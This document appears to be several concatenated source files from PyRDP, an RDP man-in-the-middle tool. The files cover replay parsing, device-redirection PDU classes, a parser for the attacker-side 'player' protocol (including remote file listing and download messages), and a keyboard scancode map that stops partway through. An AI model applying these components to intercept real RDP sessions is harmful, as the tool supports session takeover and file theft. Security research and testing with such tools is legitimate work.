#
# This file is part of the PyRDP project.
# Copyright (C) 2019-2024 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

import os
from collections import defaultdict
from typing import BinaryIO, Dict, List, Optional

from pyrdp.core import FilePositionGuard
from pyrdp.layer import PlayerLayer
from pyrdp.pdu import PlayerPDU


class Replay:
    """
    Class containing information on a replay's events.
    """

    def __init__(self, file: BinaryIO):
        self.events: Dict[int, List[int]] = {}
        self.file = file

        # Remember the current file position
        with FilePositionGuard(file):
            # Get file size
            file.seek(0, os.SEEK_END)
            size = file.tell()

            # Take note of the position of each event and its timestamp
            events = defaultdict(list)
            currentMessagePosition = 0
            file.seek(0)

            # Register PDUs as they are parsed by the layer
            def registerEvent(pdu: PlayerPDU):
                nonlocal currentMessagePosition
                events[pdu.timestamp].append(currentMessagePosition)

            # Register the offset of every event in the file.
            player = PlayerLayer()
            player.createObserver(onPDUReceived=registerEvent)

            # Parse all events in the file
            while file.tell() < size:
                data = file.read(8)
                player.recv(data)

                data = file.read(player.getDataLengthRequired())
                player.recv(data)
                currentMessagePosition = file.tell()

        # Use relative timestamps to simplify things
        if len(events) == 0:
            self.duration = 0
        else:
            timestamps = sorted(events.keys())
            referenceTime = timestamps[0]

            for absoluteTimestamp in timestamps:
                relativeTimestamp = absoluteTimestamp - referenceTime
                self.events[relativeTimestamp] = events[absoluteTimestamp]

            # Calculate total duration of replay steam
            self.duration = (timestamps[-1] - referenceTime) / 1000.0            
            # Keep the referenceTime epoch as absolute starting point of the replay
            self.referenceTime = referenceTime

    def __len__(self):
        return len(self.getSortedEvents())

    def __iter__(self):
        return ReplayReader(self)

    def getSortedTimestamps(self):
        return sorted(self.events.keys())

    def getSortedEvents(self):
        """
        Returns a flat list of all events ordered by timestamp.
        """
        return [e for _, events in sorted(self.events.items(), key=lambda pair: pair[0]) for e in events]

    def getEventStream(self):
        """
        Transform events (dict of list, timestamp: [positions], without repetition)
        into an iterable eventStream (list of tuples, [(timestamp, position), ...], with repetition)
        """
        return [(timestamp, pos)
                for timestamp, positions in sorted(self.events.items(), key=lambda pair: pair[0])
                for pos in positions
        ]


class ReplayReader:
    def __init__(self, replay: Replay):
        self.replay = replay
        self.timestamps = self.replay.getSortedTimestamps()
        self.eventPositions = self.replay.getSortedEvents()
        self.eventStream = self.replay.getEventStream()

        self.player = PlayerLayer()
        self.observer = self.player.createObserver(onPDUReceived = lambda: None)
        self.n = 0

    """
    Class used to simplify reading replays.
    """

    def readEvent(self, position: int) -> PlayerPDU:
        event: Optional[PlayerPDU] = None

        # When we feed data to self.player, this function will be called and the event variable will be set
        def onPDUReceived(pdu: PlayerPDU):
            nonlocal event
            event = pdu

        self.observer.onPDUReceived = onPDUReceived

        with FilePositionGuard(self.replay.file):
            self.replay.file.seek(position)
            data = self.replay.file.read(8)
            self.player.recv(data)

            data = self.replay.file.read(self.player.getDataLengthRequired())

            # Parse event
            self.player.recv(data)

        return event

    def __len__(self):
        return len(self.replay)

    def __next__(self):
        if self.n >= len(self.replay):
            raise StopIteration

        timestamp, position = self.eventStream[self.n]
        event = self.readEvent(position)

        self.n += 1
        return event, timestamp



#
# This file is part of the PyRDP project.
# Copyright (C) 2018, 2019, 2022 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from typing import Dict, List, Optional

from pyrdp.enum import DeviceRedirectionComponent, DeviceRedirectionPacketID, \
    DeviceType, FileAccessMask, FileAttributes, FileCreateDisposition, \
    FileCreateOptions, FileShareAccess, FileSystemInformationClass, \
    MajorFunction, MinorFunction, RDPDRCapabilityType, NTSTATUS
from pyrdp.pdu import PDU


class DeviceRedirectionPDU(PDU):
    """
    Also called Shared Header: https://msdn.microsoft.com/en-us/library/cc241324.aspx
    """

    def __init__(self, component: int, packetID: int, payload=b""):
        super().__init__(payload)
        self.component = component
        self.packetID: DeviceRedirectionPacketID = DeviceRedirectionPacketID(packetID)


class DeviceIORequestPDU(DeviceRedirectionPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241327.aspx
    """

    def __init__(self, deviceID: int, fileID: int, completionID: int, majorFunction: int, minorFunction: int, payload=b""):
        super().__init__(DeviceRedirectionComponent.RDPDR_CTYP_CORE, DeviceRedirectionPacketID.PAKID_CORE_DEVICE_IOREQUEST, payload)
        self.deviceID = deviceID
        self.fileID = fileID
        self.completionID = completionID
        self.majorFunction = majorFunction
        self.minorFunction = minorFunction


class DeviceIOResponsePDU(DeviceRedirectionPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241334.aspx
    """

    def __init__(self, majorFunction: Optional[MajorFunction], deviceID: int, completionID: int, ioStatus: NTSTATUS, payload=b""):
        super().__init__(DeviceRedirectionComponent.RDPDR_CTYP_CORE, DeviceRedirectionPacketID.PAKID_CORE_DEVICE_IOCOMPLETION)
        self.majorFunction = majorFunction
        self.deviceID = deviceID
        self.completionID = completionID
        self.ioStatus = ioStatus
        self.payload = payload


class DeviceCreateRequestPDU(DeviceIORequestPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241328.aspx
    """

    def __init__(self, deviceID: int, fileID: int, completionID: int, minorFunction: int,
                 desiredAccess: FileAccessMask, allocationSize: int, fileAttributes: FileAttributes, sharedAccess: FileShareAccess,
                 createDisposition: FileCreateDisposition, createOptions: FileCreateOptions, path: str):
        super().__init__(deviceID, fileID, completionID, MajorFunction.IRP_MJ_CREATE, minorFunction)
        self.desiredAccess = desiredAccess
        self.allocationSize = allocationSize
        self.fileAttributes = fileAttributes
        self.sharedAccess = sharedAccess
        self.createDisposition = createDisposition
        self.createOptions = createOptions
        self.path = path


class DeviceCreateResponsePDU(DeviceIOResponsePDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241335.aspx
    """

    def __init__(self, deviceID: int, completionID: int, ioStatus: NTSTATUS, fileID: int, information: int):
        super().__init__(MajorFunction.IRP_MJ_CREATE, deviceID, completionID, ioStatus)
        self.fileID = fileID
        self.information = information


class DeviceReadRequestPDU(DeviceIORequestPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241330.aspx
    """

    def __init__(self, deviceID: int, fileID: int, completionID: int, minorFunction: int,
                 length: int, offset: int):
        super().__init__(deviceID, fileID, completionID, MajorFunction.IRP_MJ_READ, minorFunction)
        self.length = length
        self.offset = offset


class DeviceReadResponsePDU(DeviceIOResponsePDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241337.aspx
    """

    def __init__(self, deviceID: int, completionID: int, ioStatus: NTSTATUS, readData: bytes):
        super().__init__(MajorFunction.IRP_MJ_READ, deviceID, completionID, ioStatus, readData)


class DeviceCloseRequestPDU(DeviceIORequestPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241329.aspx
    """

    def __init__(self, deviceID: int, fileID: int, completionID: int, minorFunction: int):
        super().__init__(deviceID, fileID, completionID, MajorFunction.IRP_MJ_CLOSE, minorFunction)


class DeviceCloseResponsePDU(DeviceIOResponsePDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241336.aspx
    """

    def __init__(self, deviceID: int, completionID: int, ioStatus: NTSTATUS):
        super().__init__(MajorFunction.IRP_MJ_CLOSE, deviceID, completionID, ioStatus)


class FileInformationBase(PDU):
    def __init__(self, informationClass: FileSystemInformationClass, fileName: str):
        super().__init__(b"")
        self.informationClass = informationClass
        self.fileName = fileName


class FileDirectoryInformation(FileInformationBase):
    def __init__(self, fileIndex: int, creationTime: int, lastAccessTime: int, lastWriteTime: int, lastChangeTime: int, endOfFilePosition: int, allocationSize: int, fileAttributes: FileAttributes, fileName: str):
        super().__init__(FileSystemInformationClass.FileDirectoryInformation, fileName)
        self.fileIndex = fileIndex
        self.creationTime = creationTime
        self.lastAccessTime = lastAccessTime
        self.lastWriteTime = lastWriteTime
        self.lastChangeTime = lastChangeTime
        self.endOfFilePosition = endOfFilePosition
        self.allocationSize = allocationSize
        self.fileAttributes = fileAttributes


class FileFullDirectoryInformation(FileInformationBase):
    def __init__(self, fileIndex: int, creationTime: int, lastAccessTime: int, lastWriteTime: int, lastChangeTime: int, endOfFilePosition: int, allocationSize: int, fileAttributes: FileAttributes, eaSize: int, fileName: str):
        super().__init__(FileSystemInformationClass.FileFullDirectoryInformation, fileName)
        self.fileIndex = fileIndex
        self.creationTime = creationTime
        self.lastAccessTime = lastAccessTime
        self.lastWriteTime = lastWriteTime
        self.lastChangeTime = lastChangeTime
        self.endOfFilePosition = endOfFilePosition
        self.allocationSize = allocationSize
        self.fileAttributes = fileAttributes
        self.eaSize = eaSize


class FileBothDirectoryInformation(FileInformationBase):
    def __init__(self, fileIndex: int, creationTime: int, lastAccessTime: int, lastWriteTime: int, lastChangeTime: int, endOfFilePosition: int, allocationSize: int, fileAttributes: FileAttributes, eaSize: int, shortName: str, fileName: str):
        super().__init__(FileSystemInformationClass.FileBothDirectoryInformation, fileName)
        self.fileIndex = fileIndex
        self.creationTime = creationTime
        self.lastAccessTime = lastAccessTime
        self.lastWriteTime = lastWriteTime
        self.lastChangeTime = lastChangeTime
        self.endOfFilePosition = endOfFilePosition
        self.allocationSize = allocationSize
        self.fileAttributes = fileAttributes
        self.eaSize = eaSize
        self.shortName = shortName


class FileNamesInformation(FileInformationBase):
    def __init__(self, fileIndex: int, fileName: str):
        super().__init__(FileSystemInformationClass.FileNamesInformation, fileName)
        self.fileIndex = fileIndex


class DeviceQueryDirectoryRequestPDU(DeviceIORequestPDU):
    def __init__(self, deviceID: int, fileID: int, completionID: int, informationClass: FileSystemInformationClass, initialQuery: int, path: str):
        super().__init__(deviceID, fileID, completionID, MajorFunction.IRP_MJ_DIRECTORY_CONTROL, MinorFunction.IRP_MN_QUERY_DIRECTORY)
        self.informationClass = informationClass
        self.initialQuery = initialQuery
        self.path = path


class DeviceDirectoryControlResponsePDU(DeviceIOResponsePDU):
    def __init__(self, minorFunction: MinorFunction, deviceID: int, completionID: int, ioStatus: NTSTATUS, payload: bytes = b""):
        super().__init__(MajorFunction.IRP_MJ_DIRECTORY_CONTROL, deviceID, completionID, ioStatus, payload)
        self.minorFunction = minorFunction


class DeviceQueryDirectoryResponsePDU(DeviceDirectoryControlResponsePDU):
    def __init__(self, deviceID: int, completionID: int, ioStatus: NTSTATUS, informationClass: FileSystemInformationClass, fileInformation: List[FileInformationBase], endByte: bytes):
        super().__init__(MinorFunction.IRP_MN_QUERY_DIRECTORY, deviceID, completionID, ioStatus)
        self.informationClass = informationClass
        self.fileInformation = fileInformation

        # Named "padding" in the documentation.
        # This byte is actually important, for some reason Windows uses it even though the documentation says
        # it should be ignored.
        # See MS-RDPEFS 2.2.3.4.10
        self.endByte = endByte


class DeviceAnnounce(PDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241326.aspx
    """

    def __init__(self, deviceType: DeviceType, deviceID: int, preferredDOSName: str, deviceData: bytes):
        super().__init__()
        self.deviceID = deviceID
        self.deviceType = deviceType
        self.preferredDOSName = preferredDOSName
        self.deviceData = deviceData


class DeviceListAnnounceRequest(DeviceRedirectionPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241355.aspx
    """

    def __init__(self, deviceList: List[DeviceAnnounce]):
        super().__init__(DeviceRedirectionComponent.RDPDR_CTYP_CORE, DeviceRedirectionPacketID.PAKID_CORE_DEVICELIST_ANNOUNCE)
        self.deviceList = deviceList


class DeviceRedirectionCapability(PDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241325.aspx
    """
    def __init__(self, capabilityType: RDPDRCapabilityType, version: int, payload=b""):
        super().__init__(payload=payload)
        self.capabilityType = capabilityType
        self.version = version


class DeviceRedirectionGeneralCapability(DeviceRedirectionCapability):
    """
    https://msdn.microsoft.com/en-us/library/cc241349.aspx
    """

    def __init__(self, version: int, osType: int, osVersion: int, protocolMajorVersion: int,
                 protocolMinorVersion: int, ioCode1: int, ioCode2: int, extendedPDU: int, extraFlags1: int,
                 extraFlags2: int, specialTypeDeviceCap: Optional[int]):
        super().__init__(RDPDRCapabilityType.CAP_GENERAL_TYPE, version)
        self.osType = osType
        self.osVersion = osVersion
        self.protocolMajorVersion = protocolMajorVersion
        self.protocolMinorVersion = protocolMinorVersion
        self.ioCode1 = ioCode1
        self.ioCode2 = ioCode2
        self.extendedPDU = extendedPDU
        self.extraFlags1 = extraFlags1
        self.extraFlags2 = extraFlags2
        self.specialTypeDeviceCap = specialTypeDeviceCap


class DeviceRedirectionCapabilitiesPDU(DeviceRedirectionPDU):
    """
    Base class for capability PDU (client and server) because they're pretty much the same
    """
    def __init__(self, packetID: DeviceRedirectionPacketID, capabilities: Dict[RDPDRCapabilityType, DeviceRedirectionCapability]):
        super().__init__(DeviceRedirectionComponent.RDPDR_CTYP_CORE, packetID)
        self.capabilities = capabilities


class DeviceRedirectionServerCapabilitiesPDU(DeviceRedirectionCapabilitiesPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241348.aspx
    """
    def __init__(self, capabilities: Dict[RDPDRCapabilityType, DeviceRedirectionCapability]):
        super().__init__(DeviceRedirectionPacketID.PAKID_CORE_SERVER_CAPABILITY, capabilities)
        self.capabilities: Dict[RDPDRCapabilityType, DeviceRedirectionCapability] = capabilities


class DeviceRedirectionClientCapabilitiesPDU(DeviceRedirectionCapabilitiesPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241354.aspx
    """
    def __init__(self, capabilities: Dict[RDPDRCapabilityType, DeviceRedirectionCapability]):
        super().__init__(DeviceRedirectionPacketID.PAKID_CORE_CLIENT_CAPABILITY, capabilities)
        self.capabilities = capabilities



#
# This file is part of the PyRDP project.
# Copyright (C) 2019 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from io import BytesIO

from pyrdp.core import Int16LE, Uint16LE, Uint32LE, Uint64LE, Uint8
from pyrdp.enum import DeviceType, MouseButton, PlayerPDUType
from pyrdp.parser.segmentation import SegmentationParser
from pyrdp.pdu import Color, PlayerBitmapPDU, PlayerConnectionClosePDU, PlayerDeviceMappingPDU, \
    PlayerDirectoryListingRequestPDU, PlayerDirectoryListingResponsePDU, PlayerFileDescription, \
    PlayerFileDownloadCompletePDU, PlayerFileDownloadRequestPDU, PlayerFileDownloadResponsePDU, \
    PlayerForwardingStatePDU, PlayerKeyboardPDU, PlayerMouseButtonPDU, PlayerMouseMovePDU, PlayerMouseWheelPDU, \
    PlayerPDU, PlayerTextPDU


class PlayerParser(SegmentationParser):
    """
    Parser used for parsing messages to and from the PyRDP player. The player can be used by attackers to see the
    RDP session in real time and take control of the session.
    """

    def __init__(self):
        super().__init__()

        self.parsers = {
            PlayerPDUType.CONNECTION_CLOSE: self.parseConnectionClose,
            PlayerPDUType.MOUSE_MOVE: self.parseMouseMove,
            PlayerPDUType.MOUSE_BUTTON: self.parseMouseButton,
            PlayerPDUType.MOUSE_WHEEL: self.parseMouseWheel,
            PlayerPDUType.KEYBOARD: self.parseKeyboard,
            PlayerPDUType.TEXT: self.parseText,
            PlayerPDUType.FORWARDING_STATE: self.parseForwardingState,
            PlayerPDUType.BITMAP: self.parseBitmap,
            PlayerPDUType.DEVICE_MAPPING: self.parseDeviceMapping,
            PlayerPDUType.DIRECTORY_LISTING_REQUEST: self.parseDirectoryListingRequest,
            PlayerPDUType.DIRECTORY_LISTING_RESPONSE: self.parseDirectoryListingResponse,
            PlayerPDUType.FILE_DOWNLOAD_REQUEST: self.parseFileDownloadRequest,
            PlayerPDUType.FILE_DOWNLOAD_RESPONSE: self.parseFileDownloadResponse,
            PlayerPDUType.FILE_DOWNLOAD_COMPLETE: self.parseFileDownloadComplete,
        }

        self.writers = {
            PlayerPDUType.CONNECTION_CLOSE: self.writeConnectionClose,
            PlayerPDUType.MOUSE_MOVE: self.writeMouseMove,
            PlayerPDUType.MOUSE_BUTTON: self.writeMouseButton,
            PlayerPDUType.MOUSE_WHEEL: self.writeMouseWheel,
            PlayerPDUType.KEYBOARD: self.writeKeyboard,
            PlayerPDUType.TEXT: self.writeText,
            PlayerPDUType.FORWARDING_STATE: self.writeForwardingState,
            PlayerPDUType.BITMAP: self.writeBitmap,
            PlayerPDUType.DEVICE_MAPPING: self.writeDeviceMapping,
            PlayerPDUType.DIRECTORY_LISTING_REQUEST: self.writeDirectoryListingRequest,
            PlayerPDUType.DIRECTORY_LISTING_RESPONSE: self.writeDirectoryListingResponse,
            PlayerPDUType.FILE_DOWNLOAD_REQUEST: self.writeFileDownloadRequest,
            PlayerPDUType.FILE_DOWNLOAD_RESPONSE: self.writeFileDownloadResponse,
            PlayerPDUType.FILE_DOWNLOAD_COMPLETE: self.writeFileDownloadComplete,
        }


    def getPDULength(self, data: bytes) -> int:
        return Uint64LE.unpack(data[: 8])

    def isCompletePDU(self, data: bytes) -> bool:
        if len(data) < 8:
            return False

        return len(data) >= self.getPDULength(data)


    def parse(self, data: bytes) -> PlayerPDU:
        stream = BytesIO(data)

        length = Uint64LE.unpack(stream)
        pduType = PlayerPDUType(Uint16LE.unpack(stream))
        timestamp = Uint64LE.unpack(stream)

        if pduType in self.parsers:
            return self.parsers[pduType](stream, timestamp)

        payload = stream.read(length - 18)
        return PlayerPDU(pduType, timestamp, payload)

    def write(self, pdu: PlayerPDU) -> bytes:
        substream = BytesIO()

        Uint16LE.pack(pdu.header, substream)
        Uint64LE.pack(pdu.timestamp, substream)

        if pdu.header in self.writers:
            self.writers[pdu.header](pdu, substream)

        substream.write(pdu.payload)
        substreamValue = substream.getvalue()

        stream = BytesIO()
        Uint64LE.pack(len(substreamValue) + 8, stream)
        stream.write(substreamValue)

        return stream.getvalue()


    def parseConnectionClose(self, _: BytesIO, timestamp: int) -> PlayerConnectionClosePDU:
        return PlayerConnectionClosePDU(timestamp)

    def writeConnectionClose(self, pdu: PlayerConnectionClosePDU, stream: BytesIO):
        pass


    def parseMousePosition(self, stream: BytesIO) -> (int, int):
        x = Uint16LE.unpack(stream)
        y = Uint16LE.unpack(stream)
        return x, y

    def writeMousePosition(self, x: int, y: int, stream: BytesIO):
        Uint16LE.pack(x, stream)
        Uint16LE.pack(y, stream)


    def parseMouseMove(self, stream: BytesIO, timestamp: int) -> PlayerMouseMovePDU:
        x, y = self.parseMousePosition(stream)
        return PlayerMouseMovePDU(timestamp, x, y)

    def writeMouseMove(self, pdu: PlayerMouseMovePDU, stream: BytesIO):
        self.writeMousePosition(pdu.x, pdu.y, stream)


    def parseMouseButton(self, stream: BytesIO, timestamp: int) -> PlayerMouseButtonPDU:
        x, y = self.parseMousePosition(stream)
        button = MouseButton(Uint8.unpack(stream))
        pressed = Uint8.unpack(stream)
        return PlayerMouseButtonPDU(timestamp, x, y, button, bool(pressed))

    def writeMouseButton(self, pdu: PlayerMouseButtonPDU, stream: BytesIO):
        self.writeMousePosition(pdu.x, pdu.y, stream)
        Uint8.pack(pdu.button.value, stream)
        Uint8.pack(int(pdu.pressed), stream)


    def parseMouseWheel(self, stream: BytesIO, timestamp: int) -> PlayerMouseWheelPDU:
        x, y = self.parseMousePosition(stream)
        delta = Int16LE.unpack(stream)
        horizontal = bool(Uint8.unpack(stream))
        return PlayerMouseWheelPDU(timestamp, x, y, delta, horizontal)

    def writeMouseWheel(self, pdu: PlayerMouseWheelPDU, stream: BytesIO):
        self.writeMousePosition(pdu.x, pdu.y, stream)
        Int16LE.pack(pdu.delta, stream)
        Uint8.pack(int(pdu.horizontal), stream)


    def parseKeyboard(self, stream: BytesIO, timestamp: int) -> PlayerKeyboardPDU:
        code = Uint16LE.unpack(stream)
        released = bool(Uint8.unpack(stream))
        extended = bool(Uint8.unpack(stream))
        return PlayerKeyboardPDU(timestamp, code, released, extended)

    def writeKeyboard(self, pdu: PlayerKeyboardPDU, stream: BytesIO):
        Uint16LE.pack(pdu.code, stream)
        Uint8.pack(int(pdu.released), stream)
        Uint8.pack(int(pdu.extended), stream)


    def parseText(self, stream: BytesIO, timestamp: int) -> PlayerTextPDU:
        length = Uint8.unpack(stream)
        character = stream.read(length).decode()
        released = Uint8.unpack(stream)
        return PlayerTextPDU(timestamp, character, bool(released))

    def writeText(self, pdu: PlayerTextPDU, stream: BytesIO):
        encoded = pdu.character[: 1].encode()

        Uint8.pack(len(encoded), stream)
        stream.write(encoded)
        Uint8.pack(int(pdu.released), stream)


    def parseForwardingState(self, stream: BytesIO, timestamp: int) -> PlayerForwardingStatePDU:
        forwardInput = bool(Uint8.unpack(stream))
        forwardOutput = bool(Uint8.unpack(stream))
        return PlayerForwardingStatePDU(timestamp, forwardInput, forwardOutput)

    def writeForwardingState(self, pdu: PlayerForwardingStatePDU, stream: BytesIO):
        Uint8.pack(int(pdu.forwardInput), stream)
        Uint8.pack(int(pdu.forwardOutput), stream)


    def parseColor(self, stream: BytesIO) -> Color:
        r = Uint8.unpack(stream)
        g = Uint8.unpack(stream)
        b = Uint8.unpack(stream)
        a = Uint8.unpack(stream)
        return Color(r, g, b, a)

    def writeColor(self, color: Color, stream: BytesIO):
        Uint8.pack(color.r, stream)
        Uint8.pack(color.g, stream)
        Uint8.pack(color.b, stream)
        Uint8.pack(color.a, stream)

    def parseBitmap(self, stream: BytesIO, timestamp: int) -> PlayerBitmapPDU:
        width = Uint32LE.unpack(stream)
        height = Uint32LE.unpack(stream)
        pixels = stream.read(width * height * 4)
        return PlayerBitmapPDU(timestamp, width, height, pixels)

    def writeBitmap(self, pdu: PlayerBitmapPDU, stream: BytesIO):
        Uint32LE.pack(pdu.width, stream)
        Uint32LE.pack(pdu.height, stream)
        stream.write(pdu.pixels)


    def parseDeviceMapping(self, stream: BytesIO, timestamp: int) -> PlayerDeviceMappingPDU:
        deviceID = Uint32LE.unpack(stream)
        deviceType = DeviceType(Uint32LE.unpack(stream))
        nameLength = Uint32LE.unpack(stream)
        name = stream.read(nameLength).decode()
        return PlayerDeviceMappingPDU(timestamp, deviceID, deviceType, name)

    def writeDeviceMapping(self, pdu: PlayerDeviceMappingPDU, stream: BytesIO):
        name = pdu.name.encode()

        Uint32LE.pack(pdu.deviceID, stream)
        Uint32LE.pack(pdu.deviceType, stream)
        Uint32LE.pack(len(name), stream)
        stream.write(name)


    def parseDirectoryListingRequest(self, stream: BytesIO, timestamp: int) -> PlayerDirectoryListingRequestPDU:
        deviceID = Uint32LE.unpack(stream)
        length = Uint32LE.unpack(stream)
        path = stream.read(length).decode()
        return PlayerDirectoryListingRequestPDU(timestamp, deviceID, path)

    def writeDirectoryListingRequest(self, pdu: PlayerDirectoryListingRequestPDU, stream: BytesIO):
        path = pdu.path.encode()

        Uint32LE.pack(pdu.deviceID, stream)
        Uint32LE.pack(len(path), stream)
        stream.write(path)


    def parseFileDescription(self, stream: BytesIO) -> PlayerFileDescription:
        length = Uint32LE.unpack(stream)
        path = stream.read(length).decode()
        isDirectory = bool(Uint8.unpack(stream))

        return PlayerFileDescription(path, isDirectory)

    def writeFileDescription(self, description: PlayerFileDescription, stream: BytesIO):
        path = description.path.encode()

        Uint32LE.pack(len(path), stream)
        stream.write(path)
        Uint8.pack(int(description.isDirectory), stream)


    def parseDirectoryListingResponse(self, stream: BytesIO, timestamp: int) -> PlayerDirectoryListingResponsePDU:
        deviceID = Uint32LE.unpack(stream)
        count = Uint32LE.unpack(stream)
        fileDescriptions = [self.parseFileDescription(stream) for _ in range(count)]

        return PlayerDirectoryListingResponsePDU(timestamp, deviceID, fileDescriptions)

    def writeDirectoryListingResponse(self, pdu: PlayerDirectoryListingResponsePDU, stream: BytesIO):
        Uint32LE.pack(pdu.deviceID, stream)
        Uint32LE.pack(len(pdu.fileDescriptions), stream)

        for description in pdu.fileDescriptions:
            self.writeFileDescription(description, stream)


    def parseFileDownloadRequest(self, stream: BytesIO, timestamp: int) -> PlayerFileDownloadRequestPDU:
        deviceID = Uint32LE.unpack(stream)
        length = Uint32LE.unpack(stream)
        path = stream.read(length).decode()
        return PlayerFileDownloadRequestPDU(timestamp, deviceID, path)

    def writeFileDownloadRequest(self, pdu: PlayerFileDownloadRequestPDU, stream: BytesIO):
        path = pdu.path.encode()

        Uint32LE.pack(pdu.deviceID, stream)
        Uint32LE.pack(len(path), stream)
        stream.write(path)


    def parseFileDownloadResponse(self, stream: BytesIO, timestamp: int) -> PlayerFileDownloadResponsePDU:
        deviceID = Uint32LE.unpack(stream)
        pathLength = Uint32LE.unpack(stream)
        path = stream.read(pathLength).decode()
        offset = Uint64LE.unpack(stream)
        payloadLength = Uint32LE.unpack(stream)
        payload = stream.read(payloadLength)

        return PlayerFileDownloadResponsePDU(timestamp, deviceID, path, offset, payload)

    def writeFileDownloadResponse(self, pdu: PlayerFileDownloadResponsePDU, stream: BytesIO):
        path = pdu.path.encode()

        Uint32LE.pack(pdu.deviceID, stream)
        Uint32LE.pack(len(path), stream)
        stream.write(path)
        Uint64LE.pack(pdu.offset, stream)
        Uint32LE.pack(len(pdu.payload), stream)
        stream.write(pdu.payload)


    def parseFileDownloadComplete(self, stream: BytesIO, timestamp: int) -> PlayerFileDownloadCompletePDU:
        deviceID = Uint32LE.unpack(stream)
        length = Uint32LE.unpack(stream)
        path = stream.read(length).decode()
        error = Uint32LE.unpack(stream)
        return PlayerFileDownloadCompletePDU(timestamp, deviceID, path, error)

    def writeFileDownloadComplete(self, pdu: PlayerFileDownloadCompletePDU, stream: BytesIO):
        path = pdu.path.encode()

        Uint32LE.pack(pdu.deviceID, stream)
        Uint32LE.pack(len(path), stream)
        stream.write(path)
        Uint32LE.pack(pdu.error, stream)


#
# This file is part of the PyRDP project.
# Copyright (C) 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

# No choice but to import * here for load_layer to work properly.
from scapy.all import *  # noqa

load_layer("tls")  # noqa



#
# This file is part of the PyRDP project.
# Copyright (C) 2019-2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from typing import Optional

from PySide6.QtCore import Qt
from PySide6.QtGui import QKeyEvent

SCANCODE_MAPPING = {
    Qt.Key.Key_Escape: 0x01,
    Qt.Key.Key_1: 0x02,
    Qt.Key.Key_Exclam: 0x02,
    Qt.Key.Key_2: 0x03,
    Qt.Key.Key_At: 0x03,
    Qt.Key.Key_3: 0x04,
    Qt.Key.Key_NumberSign: 0x04,
    Qt.Key.Key_4: 0x05,
    Qt.Key.Key_Dollar: 0x05,
    Qt.Key.Key_5: 0x06,
    Qt.Key.Key_Percent: 0x06,
    Qt.Key.Key_6: 0x07,
    Qt.Key.Key_AsciiCircum: 0x07,
    Qt.Key.Key_7: 0x08,
    Qt.Key.Key_Ampersand: 0x08,
    Qt.Key.Key_8: 0x09,
    Qt.Key.Key_Asterisk: 0x09,
    Qt.Key.Key_9: 0x0A,
    Qt.Key.Key_ParenLeft: 0x0A,
    Qt.Key.Key_0: 0x0B,
    Qt.Key.Key_ParenRight: 0x0B,
    Qt.Key.Key_Minus: 0x0C,
    Qt.Key.Key_Underscore: 0x0C,
    Qt.Key.Key_Equal: 0x0D,
    Qt.Key.Key_Plus: 0x0D,
    Qt.Key.Key_Backspace: 0x0E,
    Qt.Key.Key_Tab: 0x0F,
    Qt.Key.Key_Q: 0x10,
    Qt.Key.Key_W: 0x11,
    Qt.Key.Key_E: 0x12,
    Qt.Key.Key_R: 0x13,
    Qt.Key.Key_T: 0x14,
    Qt.Key.Key_Y: 0x15,
    Qt.Key.Key_U: 0x16,
    Qt.Key.Key_I: 0x17,
    Qt.Key.Key_O: 0x18,
    Qt.Key.Key_P: 0x19,
    Qt.Key.Key_BracketLeft: 0x1A,
    Qt.Key.Key_BraceLeft: 0x1A,
    Qt.Key.Key_BracketRight: 0x1B,
    Qt.Key.Key_BraceRight: 0x1B,
    Qt.Key.Key_Return: 0x1C,
    Qt.Key.Key_Control: 0x1D,
    Qt.Key.Key_A: 0x1E,
    Qt.Key.Key_S: 0x1F,
    Qt.Key.Key_D: 0x20,
    Qt.Key.Key_F: 0x21,
    Qt.Key.Key_G: 0x22,
    Qt.Key.Key_H: 0x23,
    Qt.Key.Key_J: 0x24,
    Qt.Key.Key_K: 0x25,
    Qt.Key.Key_L: 0x26,
    Qt.Key.Key_Semicolon: 0x27,
    Qt.Key.Key_Colon: 0x27,
    Qt.Key.Key_Apostrophe: 0x28,
    Qt.Key.Key_QuoteDbl: 0x28,
    Qt.Key.Key_QuoteLeft: 0x29,
    Qt.Key.Key_AsciiTilde: 0x29,
    Qt.Key.Key_Shift: 0x2A,
    Qt.Key.Key_Backslash: 0x2B,
    Qt.Key.Key_Bar: 0x2B,
    Qt.Key.Key_Z: 0x2C,
    Qt.Key.Key_X: 0x2D,
    Qt.Key.Key_C: 0x2E,
    Qt.Key.Key_V: 0x2F,
    Qt.Key.Key_B: 0x30,
    Qt.Key.Key_N: 0x31,
    Qt.Key.Key_M: 0x32,
    Qt.Key.Key_Comma: 0x33,
    Qt.Key.Key_Less: 0x33,
    Qt.Key.Key_Period: 0x34,
    Qt.Key.Key_Greater: 0x34,
    Qt.Key.Key_Slash: 0x35,
    Qt.Key.Key_Question: 0x35,
    Qt.Key.Key_Alt: 0x38,
    Qt.Key.Key_AltGr: 0x38,
    Qt.Key.Key_Space: 0x39,
    Qt.Key.Key_CapsLock: 0x3A,
    Qt.Key.Key_F1: 0x3B,
    Qt.Key.Key_F2: 0x3C,
    Qt.Key.Key_F3: 0x3D,
    Qt.Key.Key_F4: 0x3E,
    Qt.Key.Key_F5: 0x3F,
    Qt.Key.Key_F6: 0x40,
    Qt.Key.Key_F7: 0x41,
    Qt.Key.Key_F8: 0x42,
    Qt.Key.Key_F9: 0x43,
    Qt.Key.Key_F10: 0x44,
    Qt.Key.Key_NumLock: 0x45,
    Qt.Key.Key_ScrollLock: 0x46,
    Qt.Key.Key_Home: 0x47,
    Qt.Key.Key_Up: 0x48,
    Qt.Key.Key_PageUp: 0x49,
    Qt.Key.Key_Left: 0x4B,
    Qt.Key.Key_Right: 0x4D,
    Qt.Key.Key_End: 0x4F,
